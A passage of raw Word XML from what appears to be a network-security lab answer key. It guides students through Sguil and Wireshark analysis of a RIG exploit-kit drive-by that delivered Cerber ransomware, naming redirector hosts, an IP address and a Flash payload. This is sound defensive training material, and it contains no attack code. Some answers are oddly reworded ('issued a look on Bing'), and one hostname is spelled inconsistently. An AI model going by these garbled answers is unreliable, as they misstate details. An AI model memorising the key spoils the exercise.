        <w:t>).</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According to the IDS signature rule which malware family triggered this alert? You may need to scroll through the alert signature to find this entry.</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Malware_family PseudoDarkLeech</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2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Maximize the Sguil window and size the Event Message column so that you can see the text of the entire message. Look at the Event Messages for each of the alert IDs related to this attack.</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According to the Event Messages in Sguil what exploit kit (EK) is involved in this attack?</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RIG EK Exploit</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Beyond labelling the attack as trojan activity, what other information is provided regarding the type and name of the malware involved?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ransomware, Cerber</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By your best estimate looking at the alerts so far, what is the basic vector of this attack? How did the attack take place?</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attack seems to have taken place by visiting a malicious web page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2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View Transcripts of Events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3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Right-click the associated alert ID 5.2 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">). Select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transcript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the menu as shown in the figure. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="1619885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 9" descr="screenshot of sguil alert id 5.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screenshot of sguil alert id 5.2  highlighted"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1619885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:r>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referer and host websites that are involved in the first SRC event? What do you think the user did to generate this alert?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client issued a look on Bing with the look terms “home advancement remodeling your kitchen.” The client clicked the www.homeimprovement.com interface and gone to that location.</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keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3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Right-click the alert ID 5.24 (source IP address of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>139.59.160.143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS Evil Redirector Leading to EK March 15 2017)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Transcript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to open a transcript of the conversation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5486400" cy="1765300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture 16" descr="screenshot of sguil alert id 5.2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screenshot of sguil alert id 5.24 highlighted"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1765300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3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Refer to the transcript and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kind of request was involved?</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HTTP/1.1 GET request</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Were any files requested?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dle_js.js</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URL for the referer and the host website?</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referer site was www.homeimprovement.com/remodeling-your-kitchen-cabinets.html and the have site was retrotip.visionbura.com.ve.</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How the content encoded?</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gzip</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3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Close the current transcript window. In the Sguil window, right-click the alert ID 5.25 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>) and open the transcript. According to the information in the transcript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How many requests and responses were involved in this alert?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3 requests and 3 responses</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was the first request?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GET /?ct=Vivaldi&amp;biw=Vivaldi.95ec</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Who was the referrer?</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www.homeimprovement.com/remodeling-your-kitchen-cabinets.html</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Who was the host server request to?</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tyu.benme.com</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Was the response encoded?</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Yes, gzip</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was the second request?</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POST /?oq=CEh3h8…. Vivaldi</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Who was the host server request to?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tyu.benme.com</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Was the response encoded?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Yes, gzip</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was the third request?</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GET /?biw=SeaMonkey.105….</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Who was the referrer?</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http://tyu.benme.com/?biw…</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was the Content-Type of the third response?</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application/x-shockwave-flash</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were the first 3 characters of the data in the response? The data starts after the last </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DST:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk42787138"/>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CWS</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bookmarkEnd w:id="0"/>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CWS is a file signature. File signatures help identify the type of file that is represented different types of data. Go to the following website </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/List_of_file_signatures</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="InternetLink"/>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Ctrl-F to open a find box. Search for this file signature to find out what type of file was downloaded in the data.</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type of file was downloaded? What application uses this type of file?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swf, Adobe Flash</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3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Close the transcript window.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3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Right-click the same ID again and choose Network Miner. Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab.</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How many files are there and what is the file types?</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There are three files. Two are .html files and one is the .swf file.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2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>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Use Wireshark to Investigate an Attack</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Part 3, you will pivot to Wireshark to closely examine the details of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3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Pivot to Wireshark and Change Settings.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>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Sguil, right-click the alert ID 5.2 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>) and pivot to select Wireshark from the menu. The pcap that is associated with this alert will open in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3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The default Wireshark setting uses a relative time per-packet which is not very helpful for isolating the exact time an event occurred. To fix this, select to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>View &gt; Time Display Format &gt; Date and Time of Day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then repeat a second time, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>View &gt; Time Display Format &gt; Seconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>. Now your Wireshark Time column has the date and timestamps. Resize the columns to make the display clearer if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3790950" cy="1600835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="Picture 28" descr="screenshot of wireshark with the first ent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screenshot of wireshark with the first entry highlighted"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3790950" cy="1600835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3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Investigate HTTP Traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4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Wireshark, use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> display filter to filter for web requests only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5260340" cy="958850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="Picture 18" descr="screenshot of wireshark with the first entry highlighted and http.request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screenshot of wireshark with the first entry highlighted and http.request filtered"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5260340" cy="958850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Select the first packet. In the packet details area, expand the Hypertext Transfer Protocol application </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>layer data.</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website directed the user to the www.homeimprovement.com website?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Bing</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3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4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View HTTP Objects.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4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Wireshark, choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t>.</w:t>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the Export HTTP objects list window, select the remodeling-your-kitchen-cabinets.html packet and save it to your home folder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4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Close Wireshark. In Sguil, right-click the alert ID 5.24 (source IP address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>139.59.160.143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRRENT_EVENTS Evil Redirector Leading to EK March 15 2017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">) and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to pivot to Wireshark. Apply an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> display filter and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http request for?</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 JavaScript file that is named dle_js.js.</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is the host server?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retrotip.visionurbana.com.ve</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4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Wireshark, go to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and save the JavaScript file to your home folder.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4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Close Wireshark. In Sguil, right-click the alert ID 5.25 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">) and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to pivot to Wireshark. Apply an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> display filter. Notice that this alert corresponds to the three GET, POST, and GET requests that we looked at earlier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext w:val="true"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="47"/>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With the first packet selected, in the packet details area, expand the Hypertext Transfer Protocol application layer data. Right-click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apply as Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:asciiTheme="majorBidi" w:cstheme="majorBidi" w:hAnsiTheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> to add the Host information to the packet list columns, as shown in the figure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Visual"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4241800" cy="2859405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="Picture 42" descr="screenshot of wireshark with with apply as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 descr="screenshot of wireshark with with apply as column highlighted"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4241800" cy="2859405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4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To make room for the Host column right-click the Length column header and uncheck it. This will remove the Length column from the display.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="4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names of the servers are now clearly visible in the Host column of the packet list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
